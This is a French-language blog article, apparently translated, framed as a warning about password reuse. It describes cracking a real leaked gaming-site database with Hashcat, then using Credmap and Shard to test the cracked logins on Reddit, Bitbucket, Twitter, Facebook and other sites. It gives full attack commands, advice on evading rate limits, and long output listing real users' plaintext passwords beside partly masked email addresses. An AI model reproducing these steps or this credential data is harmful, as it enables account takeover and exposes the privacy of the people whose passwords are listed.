Login

Lost your password?
Don't have an account? Sign Up

Piratez 200 comptes d’utilisateurs en ligne en moins de 2 heures

Des bases de données fuites sont diffusées sur Internet et personne ne semble le remarquer. Nous sommes devenus insensibles aux violations de données qui se produisent quotidiennement parce que cela se produit si fréquemment. Rejoignez-moi pour illustrer pourquoi la réutilisation des mots de passe sur plusieurs sites Web est une pratique vraiment horrible – et compromettez des centaines de comptes de médias sociaux dans le processus.

Dans une récente enquête de LastPass , il a été révélé que:

Plus de 53% des répondants ont avoué ne pas avoir changé leur mot de passe au cours des 12 derniers mois … malgré l’annonce d’une violation de données impliquant une compromission de mot de passe.

Les gens ne se soucient tout simplement pas de mieux protéger leur identité en ligne et de sous-estimer leur valeur aux yeux des pirates. Je suis devenu curieux de savoir (de manière réaliste) combien de comptes en ligne un attaquant pourrait compromettre à partir d’une seule violation de données, j’ai donc commencé à fouiller sur Internet ouvert pour rechercher des bases de données divulguées.

Étape 1

Choisir le candidat

Au moment de décider d’une brèche à enquêter, je voulais un ensemble de données récent qui permettrait de comprendre précisément jusqu’où un attaquant peut aller. Je me suis installé sur un petit site Web de jeu qui a subi une violation de données en 2017 et dont toute la base de données SQL a été divulguée. Pour protéger les utilisateurs et leur identité, je ne nommerai pas le site Web ni ne divulguerai aucune des adresses e-mail trouvées dans la fuite.

L’ensemble de données se composait d’environ 1 100 e-mails uniques, noms d’utilisateur, mot de passe haché, sels et adresses IP d’utilisateurs séparés par des deux points dans le format suivant.

email:username:hashed_password:salt:ip_address

Étape 2

Briser les hachages

Le hachage de mot de passe est conçu pour agir comme une fonction à sens unique: une opération facile à effectuer et difficile à inverser pour les attaquants. C’est un type de cryptage qui transforme les informations lisibles (mots de passe en texte clair) en données brouillées (hachages). Cela signifiait essentiellement que je devais libérer (casser) les chaînes hachées pour apprendre le mot de passe de chaque utilisateur à l’aide du tristement célèbre outil de hachage de hachage Hashcat .

Créé par Jens “atom” Steube , Hashcat est l’utilitaire de récupération de mot de passe le plus rapide et le plus avancé au monde. Hashcat prend actuellement en charge plus de 200 algorithmes de hachage hautement optimisés tels que NetNTLMv2 , LastPassWPA / WPA2 et vBulletin, l’algorithme utilisé par l’ensemble de données de jeu que j’ai choisi. Contrairement à Aircrack-ng et John the Ripper , Hashcat prend en charge les attaques de simulation de mot de passe basées sur le GPU qui sont exponentiellement plus rapides que les attaques basées sur le processeur.

Étape 3

Mettre en perspective les attaques par force brute

Pour donner aux lecteurs une idée de la rapidité des attaques par force brute basées sur le GPU par rapport aux attaques basées sur le processeur, vous trouverez ci-dessous un benchmark Aircrack-ng ( -S ) contre les clés WPA2 utilisant un processeur Intel i7 que l’on trouve dans la plupart des ordinateurs portables modernes.

aircrack-ng -S

8560 k/s

Cela représente 8 560 tentatives de mot de passe WPA2 par seconde. Pour quelqu’un qui n’est pas familier avec les attaques par force brute, cela peut sembler beaucoup. Mais voici un benchmark Hashcat ( -b ) contre les hachages WPA2 ( -m 2500 ) utilisant un GPU AMD de base:

hashcat -b -m 2500

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2500 - WPA/WPA2 (Iterations: 4096)

Speed.Dev.#1.....:   155.6 kH/s (417.48ms) @ Accel:128 Loops:256 Thr:256 Vec:1

L’équivalent de 155,6 kH / s correspond à 155 600 tentatives de mot de passe par seconde. Imaginez 18 processeurs Intel i7 qui forcent simultanément le même hachage – c’est à quelle vitesse un GPU peut être.

Tous les algorithmes de chiffrement et de hachage n’offrent pas le même degré de protection. En fait, la plupart offrent une très mauvaise protection contre de telles attaques par force brute. Après avoir découvert que l’ensemble de données de 1100 mots de passe hachés utilisait vBulletin, une plate-forme de forum populaire, j’ai à nouveau exécuté le test Hashcat en utilisant le hashmode correspondant ( -m 2711 ):

hashcat -b -m 2711

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2711 - vBulletin >= v3.8.5

Speed.Dev.#1.....:  1949.6 MH/s (274.43ms) @ Accel:128 Loops:512 Thr:256 Vec:1

Cela représente environ 1 949 600 000 (~ 2 milliards) de tentatives de mot de passe par seconde. Espérons que cela illustre à quel point il est facile pour toute personne disposant d’un GPU moderne de casser des hachages après une fuite de base de données.

Étape 4

Brute-Forcer les hachages

Il y avait un peu de données inutiles dans le vidage SQL brut, comme les adresses e-mail et IP des utilisateurs. Les mots de passe hachés eont été filtrés dans le format suivant.

hashed_password:salt

Les mots de passe hachés ont ensuite été introduits dans Hashcat à l’aide de la commande suivante.

hashcat -a 0 -m 2711 ~/leaks/hashes/dataset.hashes ~/wordlists/wordlist.txt -w 4 --potfile-path ~/pots/dataset.potfile

L’attaque par dictionnaire, ou «mode direct», est spécifiée à l’aide de l’ argument -a 0 . Pour améliorer les performances globales de Hashcat, je règle généralement le -w (ou –workload-profile) sur 4 , pour maximiser la vitesse de craquage. Enfin, l’ argument –potfile-path a été utilisé pour enregistrer les hachages fissurés dans le fichier spécifié.

Après avoir essayé des dizaines de listes de mots contenant des centaines de millions de mots de passe par rapport à l’ensemble de données, j’ai pu déchiffrer environ 330 (30%) des 1100 hachages en moins d’une heure. Encore un peu insatisfait, j’ai essayé plus des fonctionnalités de force brute de Hashcat:

hashcat -a 3 -m 2711 ~/leaks/hashes/dataset.hashes ?l?l?l?l?l?l?d?d -w 4 --potfile-path ~/pots/dataset.potfile

Ici, j’utilise l’ attaque de masque de Hashcat ( -a 3 ) et j’essaie tous les mots minuscules ( ? L ) de six caractères possibles se terminant par un nombre à deux chiffres ( ? D ). Cette tentative s’est également achevée dans un laps de temps relativement court et a craqué plus de 100 hachages supplémentaires, portant le nombre total de hachages craqués à exactement 475, soit environ 43% du jeu de données 1100.

Après avoir rejoint les hachages fissurés avec leur adresse e-mail correspondante, il me restait 475 lignes de l’ensemble de données suivant.

******@web.de:Sodium60
******@phaphach.com:Xi@oxiao123
*****@hotmail.nl:rockybalboa
********@gmail.com:ariel420
*******@HOTMAIL.COM:SLOANE01
******@paul198112.plus.com:creative
*******@hotmail.com:67thdtR8nP
******@gmail.com:bullets
*****@terra.com.mx:590416
******@gmail.com:juan930122
*******@aol.de:Madison1990
******@verizon.net:entropy33
*****@gmail.com:flyboy21
*******@gmail.com:rat7
********@jacks.sdstate.edu:entern0w
******@gmail.com:pookieg
******@hotmail.com:kevlar11
*******@myactv.net:1oldman1
******@hotmail.com:dodgers
********@mail.ru:wodI14z2eF
*******@yahoo.de:bella1811
*****@gmail.com:jojo82
*****@hotmail.com:metalfire
*******@gmail.com:nonoobs810
******@gmail.com:bobby10
*******@gmail.com:5Zurt8q8tQ

Étape 5

Vérification de la réutilisation du mot de passe

Comme je l’ai mentionné, cet ensemble de données a été divulgué à partir d’un petit site Web de jeu inconnu. La vente de ces comptes de jeu ne produirait que très peu de valeur pour un pirate informatique. La valeur réside dans la fréquence à laquelle ces utilisateurs ont réutilisé leur nom d’utilisateur, leur adresse e-mail et leur mot de passe sur d’autres sites Web populaires.

Pour comprendre cela, Credmap et Shard ont été utilisés pour automatiser la détection de la réutilisation des mots de passe. Ces outils sont assez similaires mais j’ai décidé de présenter les deux car leurs résultats étaient différents de plusieurs manières qui sont détaillées plus loin dans cet article.

Option 1

Utilisation de Credmap

Credmap est un script Python et ne nécessite aucune dépendance. Cloner simplement le dépôt GitHub et charger  le répertoire credmap pour commencer à l’ utiliser.

git clone https://github.com/lightos/credmap
cd credmap

L’ argument –list peut être utilisé pour afficher les sites Web pris en charge actuellement par Credmap.

./credmap.py --list

               . .IIIII             .II
  I123456IIII. I  II  .    II..IIIIIIIIIIIIIIIIIIII
 .  .IIIIII  II             IIIIIIHUNTER2IIIII  I.
    .IIIII.III I        IIIIIIIIIIIIIIIIIIIIIII
   .IILOVEII           II  .IIIII IIIIIIIIIIII. I
    IIIIII             IIII I  IISECRETIIIIIII I
    .II               IIIIIIIIIIIII  IIIIIIIII
       I.           .IIIABC123IIII    I   II  I
         .IIII        IIIIIIIIIIII     .       I
          IIIII.          IIIIII           . I.
          IIGODIII         IIIII             ..I  II .
           IIIIII          IIII...             IIII
            IIII           III. I            IISEXII
            III             I                I  III
            II                                   I   .
             I

credmap v0.1-d862247 (https://github.com/lightos/credmap/)

- scribd.com
- en.wikipedia.org
- stackoverflow.com
- digitalocean.com
- yahoo.com
- linkedin.com
- wunderlist.com
- bitbucket.org
- twitter.com
- amazon.com
- ebay.com
- groupon.com
- soundcloud.com
- spotify.com
- airbnb.com
- live.com
- imgur.com
- foursquare.com
- pinterest.com
- instagram.com
- trakt.tv
- yelp.com
- github.com
- pastebin.com
- facebook.com
- reddit.com
- zoho.com
- vimeo.com

L’utilisation de l’ argument –load permet un format “nom d’utilisateur: mot de passe”. Credmap prend également en charge le format «nom d’utilisateur | email: mot de passe» pour les sites Web qui permettent uniquement de se connecter avec une adresse e-mail. Ceci peut être spécifié en utilisant l’ argument –format “u | e: p” .

./credmap.py --load ~/leaks/cracked/dataset_user_email_pass_combos.txt --format "u|e:p" --exclude "groupon.com, instagram.com"

Au cours de mes tests, j’ai constaté que Groupon et Instagram avaient bloqué ou mis l’adresse IP de mon VPS sur la liste noire après quelques minutes d’utilisation de Credmap. C’est sans aucun doute le résultat de dizaines de tentatives infructueuses sur une période de plusieurs minutes. J’ai décidé d’omettre (- d’ exclure ) ces sites Web, mais un attaquant motivé peut trouver des moyens simples d’usurper son adresse IP par tentative de mot de passe et de limiter le taux de ses demandes pour échapper à la capacité d’un site Web à détecter les attaques par tentative de mot de passe.

Les résultats de la commande Credmap étaient surprenants:

[********:9v6Zyl1heT] on "Bitbucket"...
[********:allus82] on "Reddit"...
[********:Jesus4ever] on "Reddit"...
[********:Jesus4ever] on "Bitbucket"...
[********:s4mb4lb1J] on "Bitbucket"...
[********:xjsv12] on "Bitbucket"...
[********:rosied] on "Bitbucket"...
[********:xbox360] on "Microsoft Live Account"...
[********:seventeen17] on "Bitbucket"...
[********:starwars] on "Scribd"...
[********:Presario123] on "Bitbucket"...
[********:podpod] on "Bitbucket"...
[********:podpod] on "Microsoft Live Account"...
[********:for795] on "Bitbucket"...
[********:isbandia] on "Wikipedia"...
[********:isbandia] on "Bitbucket"...
[********:wtEq5n22aH] on "Scribd"...
[********:240sxse] on "Reddit"...
[********:warhammer40k5] on "Bitbucket"...
[********:abeeagle] on "Reddit"...
[********:99bottles] on "Reddit"...
[********:99bottles] on "Wunderlist"...
[********:99bottles] on "Microsoft Live Account"...
[********:Checkers12] on "Reddit"...
[********:Checkers12] on "Bitbucket"...
[********:morgan13] on "Pinterest"...
[********:greencar.] on "Microsoft Live Account"...
[********:Warzone1] on "Bitbucket"...
[********:o83bjJ1rzQ] on "Bitbucket"...
[********:kajfarik] on "Foursquare"...
[********:kajfarik] on "Bitbucket"...
[********:1324Michael1324] on "Reddit"...
[********:max1mili0n] on "Microsoft Live Account"...
[********:s8elpz7c] on "Microsoft Live Account"...
[********:hitman] on "Reddit"...
[********:u9Q98rtikC] on "Bitbucket"...
[********:ab1g0r] on "Bitbucket"...
[********:stingray951] on "Bitbucket"...
[********:tard] on "Bitbucket"...
[********:Pumpkin007] on "Bitbucket"...
[********:h8802123] on "Reddit"...
[********:ownership1] on "Bitbucket"...
[********:N289wewtzF] on "Bitbucket"...
[********:Hummer1234] on "Bitbucket"...
[********:igniter123] on "Reddit"...
[********:167706] on "Bitbucket"...
[********:12341234] on "Bitbucket"...
[********:sniper] on "Bitbucket"...
[********:1212111] on "Bitbucket"...
[********:element1] on "Bitbucket"...
[********:mrb1087410] on "Bitbucket"...
[********:3k3f6wJxnK] on "Bitbucket"...
[********:spy929] on "Bitbucket"...
[********:qy913zdXpN] on "Bitbucket"...
[********:E5jnhui83D] on "Bitbucket"...
[********:6qfu6oeI8V] on "Bitbucket"...
[********:Nd9nw88grB] on "Scribd"...
[********:REGan181] on "Bitbucket"...
[********:skuli2779] on "Scribd"...
[********:phalanx1] on "Foursquare"...
[********:ariel420] on "Microsoft Live Account"...
[********:SLOANE01] on "Bitbucket"...
[********:67thdtR8nP] on "Scribd"...
[********:bullets] on "Bitbucket"...
[********:flyboy21] on "Wunderlist"...
[********:pookieg] on "Reddit"...
[********:bella1811] on "Reddit"...
[********:jojo82] on "Foursquare"...
[********:nonoobs810] on "Microsoft Live Account"...
[********:maxima1231] on "Reddit"...
[********:maxima1231] on "Pinterest"...
[********:ai7o8Z8vxO] on "Scribd"...
[********:mustang1] on "Reddit"...
[********:M.ustang9939] on "Bitbucket"...
[********:Balingwenwen123] on "Bitbucket"...
[********:dragao] on "Bitbucket"...
[********:7egixeO38Q] on "Scribd"...
[********:astonm] on "Bitbucket"...
[********:Nascar2405] on "Foursquare"...
[********:Nascar2405] on "Microsoft Live Account"...
[********:carrie0530] on "Reddit"...
[********:F85wdvq3kX] on "Bitbucket"...
[********:A2w9taks7L] on "Scribd"...
[********:A2w9taks7L] on "Linkedin"...
[********:Hxopz542] on "Reddit"...
[********:hd070800] on "Pinterest"...
[********:hd070800] on "Bitbucket"...
[********:piper1956] on "Bitbucket"...
[********:123123qweqwe] on "Reddit"...
[********:xboxlive] on "Reddit"...
[********:xboxlive] on "Pinterest"...
[********:Xi%40oxiao123] on "Bitbucket"...
[********:metallica12] on "Bitbucket"...
[********:sianlaser12] on "Pinterest"...
[********:h8ep81knFR] on "Reddit"...
[********:plummer92] on "Reddit"...
[********:plummer92] on "Bitbucket"...
[********:8246jt] on "Reddit"...
[********:8246jt] on "Scribd"...
[********:271bEzxonZ] on "Bitbucket"...
[********:6911747] on "Scribd"...
[********:6911747] on "Bitbucket"...
[********:raejas11] on "Bitbucket"...
[********:d0bb3lts4lt0] on "Microsoft Live Account"...
[********:2yvpdl13CP] on "Scribd"...
[********:dodgers123] on "Bitbucket"...
[********:urbanus] on "Reddit"...
[********:0506571670] on "Foursquare"...
[********:gyqK8Giz1P] on "Bitbucket"...
[********:e6bnvVo67H] on "Bitbucket"...
[********:92k2cizCdP] on "Scribd"...
[********:drnCy43g4O] on "Reddit"...
[********:Ayrtonsenna1] on "Bitbucket"...
[********:aerielle] on "Microsoft Live Account"...
[********:12341234a] on "Reddit"...
[********:6Ibit6qp1F] on "Bitbucket"...
[********:5n6xcd6rPD] on "Scribd"...
[********:5n6xcd6rPD] on "Bitbucket"...
[********:Redalert1] on "Bitbucket"...
[********:2689874] on "Scribd"...
[********:2689874] on "Pinterest"...
[********:bma81092] on "Reddit"...
[********:bma81092] on "Bitbucket"...
[********:csibi2007] on "Reddit"...
[********:alterego] on "Bitbucket"...
[********:tournament] on "Bitbucket"...
[********:Lena2020] on "Pinterest"...
[********:Lena2020] on "Bitbucket"...
[********:alejandro] on "Scribd"...
[********:alejandro] on "Bitbucket"...
[********:Imtr0uble] on "Bitbucket"...
[********:sucette] on "Bitbucket"...
[********:pipQc5p24Q] on "Bitbucket"...
[********:moomoo] on "Pinterest"...
[********:N0t3p%40D%21] on "Scribd"...
[********:N0t3p%40D%21] on "Pinterest"...
[********:7bR9bft8cQ] on "Bitbucket"...
[********:puzzle] on "Bitbucket"...
[********:spartan117] on "Microsoft Live Account"...
[********:scooby1621] on "Microsoft Live Account"...
[********:mike1828] on "Microsoft Live Account"...
[********:fifer123] on "Microsoft Live Account"...
[********:e5Bo1fx3kF] on "Scribd"...
[********:monkey] on "Reddit"...
[********:darkstar] on "Bitbucket"...
[********:irzF9k6p1H] on "Reddit"...
[********:8yu9hkwV9Q] on "Scribd"...
[********:c0mmand] on "Bitbucket"...
[********:doppler] on "Reddit"...
[********:doppler] on "Scribd"...
[********:jh5thrwgefsdfs] on "Bitbucket"...
[********:roblox12] on "Bitbucket"...
[********:aqwzsxedc] on "Bitbucket"...
[********:12345tessi] on "Bitbucket"...
[********:helmond] on "Bitbucket"...
[********:Liam1123] on "Reddit"...
[********:liptoo98] on "Scribd"...
[********:b82olSn4yH] on "Bitbucket"...
[********:bossos2] on "Microsoft Live Account"...
[********:highjump] on "Bitbucket"...
[********:juhu1230] on "Reddit"...
[********:bepolite] on "Reddit"...
[********:M00nglum] on "Microsoft Live Account"...
[********:Adw2u1h3tO] on "Bitbucket"...
[********:Manly123] on "Bitbucket"...
[********:ragnarok01] on "Reddit"...
[********:useless] on "Pinterest"...
[********:starwars97] on "Reddit"...
[********:doodle] on "Bitbucket"...
[********:TYzt2013] on "Bitbucket"...
[********:Cheese77] on "Microsoft Live Account"...
[********:voxpi384] on "Bitbucket"...
[********:allah4life] on "Reddit"...
[********:allah4life] on "Wunderlist"...
[********:Jackal67] on "Reddit"...
[********:Jackal67] on "Bitbucket"...
[********:jasmine00] on "Bitbucket"...
[********:LXfn3BG952] on "Reddit"...
[********:alfiedog12] on "Pinterest"...
[********:25262928] on "Reddit"...
[********:25262928] on "Bitbucket"...
[********:Rat_isthebest] on "Foursquare"...
[********:Rat_isthebest] on "Scribd"...
[********:Rat_isthebest] on "Bitbucket"...
[********:Rat_isthebest] on "Wunderlist"...
[********:4kg83zRltG] on "Scribd"...
[********:4kg83zRltG] on "Bitbucket"...
[********:f1scher] on "Reddit"...
[********:o23jwr8uFD] on "Reddit"...
[********:o23jwr8uFD] on "Bitbucket"...
[********:ikbengek1] on "Pinterest"...
[********:Trustno1%21] on "Bitbucket"...
[********:trudat] on "Bitbucket"...
[********:tototomy] on "Bitbucket"...
[********:qwer1234] on "Bitbucket"...
[********:1391730] on "Foursquare"...
[********:robby123] on "Scribd"...
[********:actsman7] on "Bitbucket"...
[********:whodey] on "Wunderlist"...
[********:308184rt] on "Reddit"...
[********:108Resistance] on "Bitbucket"...
[********:yilin9409] on "Scribd"...
[********:joshuavi] on "Reddit"...
[********:damnkids] on "Bitbucket"...
[********:jbncde5hn6y5] on "Bitbucket"...
[********:roblox12] on "Reddit"...
[********:roblox12] on "Bitbucket"...
[********:azerty00] on "Reddit"...
[********:azerty00] on "Pinterest"...
[********:gymkhana] on "Bitbucket"...
[********:gymkhana] on "Wunderlist"...
[********:newgame] on "Reddit"...
[********:dacheng198] on "Scribd"...
[********:123456] on "Bitbucket"...
[********:syndrom02] on "Reddit"...
[********:Paintball1] on "Bitbucket"...
[********:4536729] on "Bitbucket"...
[********:rawtheme22] on "Reddit"...
[********:rawtheme22] on "Bitbucket"...
[********:sobaked123] on "Microsoft Live Account"...
[********:Thee1234] on "Bitbucket"...
[********:sersna7] on "Bitbucket"...
[********:indonesia2016] on "Scribd"...
[********:indonesia2016] on "Microsoft Live Account"...
[********:Ou6tlgr87N] on "Scribd"...
[********:sea2shell] on "Reddit"...
[********:01cs653] on "Reddit"...
[********:73icJf3ilZ] on "Scribd"...
[********:ndyr761pGO] on "Bitbucket"...
[********:prosk8ter] on "Bitbucket"...
[********:games%21%21%21] on "Pinterest"...
[********:games%21%21%21] on "Microsoft Live Account"...
[********:gt9800] on "Bitbucket"...
[********:mel4tipp] on "Microsoft Live Account"...
[********:mvp123] on "Reddit"...
[********:mvp123] on "Bitbucket"...
[********:3g82tafLbY] on "Bitbucket"...
[********:arturi09] on "Wunderlist"...
[********:arturi09] on "Microsoft Live Account"...
[********:092486] on "Bitbucket"...
[********:sappeps12345] on "Reddit"...
[********:1morerep] on "Bitbucket"...
[********:Finalfantasy89] on "Reddit"...
[********:Finalfantasy89] on "Bitbucket"...
[********:11%3D11bts] on "Scribd"...

Tous les noms d’utilisateur ont été expurgés, mais nous pouvons voir que 246 comptes Reddit, Microsoft, Foursquare, Wunderlist et Scribd ont été signalés comme ayant exactement les mêmes combinaisons nom d’utilisateur: mot de passe que le petit ensemble de données du site Web de jeu.

Option 2

Utiliser Shard

Shard nécessite Java qui peut ne pas être présent dans Kali par défaut et peut être installé à l’aide de la commande ci-dessous.

sudo apt-get install default-jre

Ensuite, téléchargez la dernière version de Shard à l’aide de la commande wget .

wget 'https://github.com/philwantsfish/shard/releases/download/1.5/shard-1.5.jar'

Comme avec Credmap, l’ argument –list peut être utilisé avec Shard pour afficher ses sites Web pris en charge.

java -jar shard-1.5.jar --list

[+] Available modules:
[+]     Facebook
[+]     LinkedIn
[+]     Reddit
[+]     Twitter
[+]     Instagram
[+]     GitHub
[+]     BitBucket
[+]     Kijiji
[+]     DigitalOcean
[+]     Vimeo
[+]     Laposte
[+]     Dailymotion

L’utilisation de Shard ne nécessite que l’ argument –file pour commencer à détecter la réutilisation du mot de passe.

java -jar shard-1.5.jar --file ~/leaks/cracked/dataset_user_email_pass_combos.txt

[+] Running in multi-user multi-password mode
[+] Parsed 475 credentials
[+] Running 11 modules
[+] *******@mail.ru:9v6Zyl1heT - Twitter
[+] *******@mail.ru:y2v7nG3oeJ - BitBucket
[+] *******@hotmail.com:5Zurt8q8tQ - BitBucket
[+] *******@yandex.com:gD82guh6iS - BitBucket
[+] *******@hotmail.com:jellybaby - BitBucket
[+] *******@gmail.com:actsman7 - Twitter, BitBucket
[+] *******@gmail.com:eternity1 - BitBucket
[+] *******@gmail.com:joker7 - BitBucket
[+] *******@aol.com:xbox360 - BitBucket
[+] *******@gmail.com:pie110016678 - BitBucket
[+] *******@live.com:roblox12 - BitBucket
[+] *******@gmail.com:andre0 - BitBucket
[+] *******@qq.com:123456 - BitBucket
[+] *******@hotmail.com:hellomotto - BitBucket
[+] *******@outlook.com:cromador - BitBucket
[+] *******@hotmail.co.uk:ibanez92 - Twitter
[+] *******@hotmail.com:Presario123 - Twitter
[+] *******@op.pl:isbandia - BitBucket
[+] *******@gmail.com:240sxse - BitBucket
[+] *******@gmail.com:99bottles - Twitter
[+] *******@gmail.com:Checkers12 - Twitter, BitBucket
[+] *******@yahoo.com:speckles - BitBucket
[+] *******@aol.fr:o83bjJ1rzQ - BitBucket
[+] *******@michaelbodach.com:1324Michael1324 - BitBucket
[+] *******@gmail.com:drhs2012 - Twitter
[+] *******@btinternet.com:max1mili0n - Facebook, BitBucket
[+] *******@gmail.com:s8elpz7c - Twitter
[+] *******@yahoo.com:hitman - Twitter
[+] *******@mail.ru:e6bnvVo67H - BitBucket
[+] *******@gmail.com:ab1g0r - BitBucket
[+] *******@gmail.com:snickers7 - BitBucket
[+] *******@gmail.com:1949qweA - BitBucket
[+] *******@live.se:stingray951 - Twitter, BitBucket
[+] *******@outlook.com:Pumpkin007 - Facebook
[+] *******@yahoo.com:baseball11 - Twitter
[+] *******@hotmail.com:h8802123 - BitBucket
[+] *******@mail.ru:i7q8c8jDkW - BitBucket
[+] *******@gmail.com:Hummer1234 - BitBucket
[+] *******@hotmail.com:50killer - BitBucket, Kijiji
[+] *******@gmail.com:igniter123 - BitBucket
[+] *******@hotmail.se:joker123 - BitBucket
[+] *******@gmail.com:orlando.12 - BitBucket
[+] *******@gmail.com:167706 - Twitter
[+] *******@hotmail.com:pssp643056 - Twitter
[+] *******@gmail.com:tacotico - Twitter, BitBucket
[+] *******@Hotmail.com:12341234 - Twitter
[+] *******@comcast.net:1212111 - BitBucket
[+] *******@mail.ru:2hg5hd4uEE - BitBucket
[+] *******@yahoo.com:element1 - BitBucket
[+] *******@msn.com:trooper71 - Facebook, Twitter
[+] *******@gmail.com:Mustang7991 - BitBucket
[+] *******@gmail.com:fuckthat - BitBucket
[+] *******@gmail.com:qy913zdXpN - BitBucket
[+] *******@hotmail.com:vdz3888 - BitBucket
[+] *******@rogers.com:maplew00d - Facebook
[+] *******@hotmail.com:Nd9nw88grB - BitBucket
[+] *******@msn.com:1234567890 - BitBucket
[+] *******@yahoo.com:p00p00p00 - Twitter, BitBucket
[+] *******@HOTMAIL.COM:SLOANE01 - BitBucket
[+] *******@paul198112.plus.com:creative - BitBucket
[+] *******@terra.com.mx:590416 - BitBucket
[+] *******@gmail.com:juan930122 - Facebook, Twitter, BitBucket
[+] *******@aol.de:Madison1990 - BitBucket
[+] *******@verizon.net:entropy33 - BitBucket
[+] *******@gmail.com:rat7 - BitBucket
[+] *******@jacks.sdstate.edu:entern0w - BitBucket
[+] *******@hotmail.com:kevlar11 - BitBucket
[+] *******@hotmail.com:dodgers - BitBucket
[+] *******@mail.ru:wodI14z2eF - BitBucket
[+] *******@gmail.com:jojo82 - BitBucket
[+] *******@gmail.com:maxima1231 - Facebook, BitBucket
[+] *******@yahoo.com:mustang1 - BitBucket
[+] *******@gmail.com:M.ustang9939 - Twitter, BitBucket
[+] *******@gmail.com:ROFLMAO - BitBucket
[+] *******@gmail.com:qwerty - BitBucket
[+] *******@gmail.com:skatebrd1 - Twitter
[+] *******@gmail.com:carrie0530 - BitBucket
[+] *******@gmail.com:Hxopz542 - Twitter, BitBucket
[+] *******@gmail.com:hd070800 - Facebook
[+] *******@yahoo.com:xboxlive - BitBucket
[+] *******@gmail.com:sianlaser12 - BitBucket
[+] *******@live.co.uk:newworldorder11 - Facebook, Twitter
[+] *******@mail.ru:t57yuuD2nH - BitBucket
[+] *******@mail.ru:h8ep81knFR - Twitter, BitBucket
[+] *******@msn.com:Legion01 - Twitter
[+] *******@gmail.com:Vapor1948 - BitBucket
[+] *******@hotmail.com:Kerri14 - BitBucket
[+] *******@mail.ru:271bEzxonZ - BitBucket
[+] *******@gmail.com:raejas11 - Twitter
[+] *******@hotmail.com:2yvpdl13CP - BitBucket
[+] *******@mail.ru:x52Wugvl3D - BitBucket
[+] *******@hotmail.com:bcd234 - BitBucket
[+] *******@hotmail.com:dodgers123 - BitBucket
[+] *******@centurylink.net:zaq11qaz - BitBucket
[+] *******@hotmail.com:stumpy69 - BitBucket
[+] *******@gmail.com:0506571670 - Twitter, BitBucket
[+] *******@ewjc.com:fr33ze - BitBucket
[+] *******@gmail.com:gyqK8Giz1P - BitBucket
[+] *******@gmail.com:abc12345 - BitBucket
[+] *******@hotmail.com:92k2cizCdP - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@yandex.com:drnCy43g4O - Twitter
[+] *******@gmail.com:makocole1 - Twitter, Kijiji
[+] *******@gmail.com:Ayrtonsenna1 - Facebook
[+] *******@gmail.com:sixsixsix - BitBucket
[+] *******@aol.com:aerielle - BitBucket
[+] *******@yahoo.com:12341234a - Twitter
[+] *******@gmail.com:6Ibit6qp1F - BitBucket
[+] *******@gmail.com:Sapper2009 - Facebook, Twitter, BitBucket
[+] *******@gmail.com:bma81092 - Twitter, BitBucket
[+] *******@hotmail.com:tournament - BitBucket
[+] *******@hotmail.com:Lena2020 - Facebook, Twitter, BitBucket
[+] *******@yahoo.com:600543jp - BitBucket
[+] *******@blueyonder.co.uk:simpkins - BitBucket
[+] *******@gmail.com:linkin2632 - Twitter
[+] *******@yahoo.com:c572889 - Twitter
[+] *******@yahoo.com.mx:alejandro - BitBucket
[+] *******@gmail.com:conconab - BitBucket
[+] *******@free.fr:sucette - BitBucket
[+] *******@hotmail.com:pipQc5p24Q - BitBucket
[+] *******@h4milton.com:pepper10 - BitBucket
[+] *******@gmail.com:Cheese24 - BitBucket
[+] *******@gmail.com:willow76! - Facebook, Kijiji
[+] *******@live.ca:shawn2000 - Twitter, BitBucket
[+] *******@gmail.com:spartan117 - Twitter, BitBucket
[+] *******@hotmail.com:fifa2007 - Twitter
[+] *******@yahoo.com:mike1828 - BitBucket
[+] *******@live.com:Bounce989 - Twitter, BitBucket
[+] *******@gmail.com:13241324 - Twitter
[+] *******@mail.ru:e5Bo1fx3kF - BitBucket
[+] *******@mail.ru:1doc2H5wxZ - BitBucket
[+] *******@mail.ru:irzF9k6p1H - Twitter
[+] *******@gmail.com:roblox12 - Facebook, Twitter
[+] *******@hotmail.com:helmond - BitBucket
[+] *******@gmail.com:Liam1123 - BitBucket
[+] *******@yahoo.com:be6315se - Twitter
[+] *******@hotmail.com:r1s2d3nt - BitBucket
[+] *******@hotmail.com:rock18 - BitBucket
[+] *******@gmail.com:bossos2 - BitBucket
[+] *******@gmail.com:highjump - BitBucket
[+] *******@googlemail.com:juhu1230 - BitBucket
[+] *******@charter.net:amanda11 - BitBucket
[+] *******@gmail.com:Adw2u1h3tO - BitBucket
[+] *******@hotmail.com:ragnarok01 - Twitter
[+] *******@hotmail.com:Bobbobbob5 - Twitter, BitBucket
[+] *******@gmail.com:Games123 - Twitter
[+] *******@hotmail.com:good4u - Kijiji
[+] *******@hotmail.com:2211 - BitBucket
[+] *******@gmail.com:starwars97 - BitBucket
[+] *******@aol.com:hardass - BitBucket
[+] *******@gmail.com:scarface - BitBucket
[+] *******@t-online.de:143ABC1 - BitBucket
[+] *******@gmail.com:weswee234 - Twitter
[+] *******@hotmail.com:javiermago1 - BitBucket
[+] *******@yahoo.com:w1a2y3n4e5 - BitBucket
[+] *******@gmail.com:608881e - Kijiji
[+] *******@yahoo.com:074langley - BitBucket
[+] *******@hotmail.com:bosspimp - Facebook, Twitter
[+] *******@gmail.com:Driftking1 - Twitter
[+] *******@hotmail.com:voxpi384 - BitBucket
[+] *******@gmail.com:allah4life - BitBucket
[+] *******@comcast.net:Jackal67 - BitBucket
[+] *******@hotmail.com:jasmine00 - Facebook, BitBucket
[+] *******@gmail.com:10241966 - BitBucket
[+] *******@gmail.com:alfiedog12 - BitBucket
[+] *******@gmail.com:0olivia1 - BitBucket
[+] *******@gmail.com:Rat_isthebest - Kijiji
[+] *******@web.de:scoop - BitBucket
[+] *******@hotmail.com:ikbengek1 - Twitter, BitBucket
[+] *******@allansmith.net:ras04cal - Twitter
[+] *******@419.e90.biz:b82olSn4yH - BitBucket
[+] *******@hotmail.com:tototomy - Twitter
[+] *******@gmail.com:2211 - BitBucket
[+] *******@qq.com:1391730 - Twitter
[+] *******@gmail.com:robby123 - BitBucket
[+] *******@gmail.com:Logitech123 - BitBucket
[+] *******@yahoo.com:darkstar3509 - BitBucket
[+] *******@gmail.com:whodey - BitBucket
[+] *******@uhd.net.ua:h55gr5sKdQ - BitBucket
[+] *******@gmail.com:roblox12 - BitBucket
[+] *******@gmail.com:12345Brandon - BitBucket
[+] *******@gmail.com:Banan123 - BitBucket
